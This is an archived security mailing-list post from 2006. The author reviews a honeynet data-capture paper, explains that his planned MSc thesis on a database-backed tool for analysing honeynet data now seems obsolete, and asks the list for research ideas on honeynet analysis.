Back to list
Oct 25 2006 04:00PM
Christos Vasilakis (cvasilak gmail com)
I read with great interest the paper "Towards a Third Generation Data
Capture Architecture for Honeynets" by Edward Balas and Camilo Viecco.
Two years ago I proposed an MSc thesis with the title "Effectiveness
of an Integrated approach for the analysis of Honeynet data". Some
people may remember my question in the lists. Unfortunately, for
pesonal reasons I had to postpone it. Central part of my thesis was
about developing a tool that will better support the analysis phase of
honeynet data. The basic idea was to integrate the different data
sources (sebek, syslog etc) in a central database and using a kind of
a plugin mechanism (aka. predefined and user defined sql queries) to
provide a better view of the attack.
As I understand from the paper, the alliance is spending all its
efforts in improving the analysis phase of Honeynet data. As a
consequence, I believe that my MSc topic becomes kind of obsolete
because there is an ongoing work on this area. So I would like to ask
the list for any research ideas in Honeynet technology and in
particular its analysis phase.
[ reply ]
Copyright 2010, SecurityFocus